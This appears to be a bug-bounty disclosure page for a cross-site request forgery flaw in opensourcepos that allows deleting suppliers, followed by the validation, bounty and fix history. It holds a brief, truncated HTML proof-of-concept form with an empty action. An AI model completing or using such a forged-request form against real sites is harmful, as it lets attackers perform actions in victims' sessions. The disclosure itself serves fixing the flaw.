Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos


Reported on

Oct 4th 2021


Attacker able to delete supplier with CSRF attack

Proof of Concept


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="submit" value="Submit request" />

We have contacted a member of the opensourcepos team and are waiting to hear back a year ago
jekkos validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit 329f17 a year ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation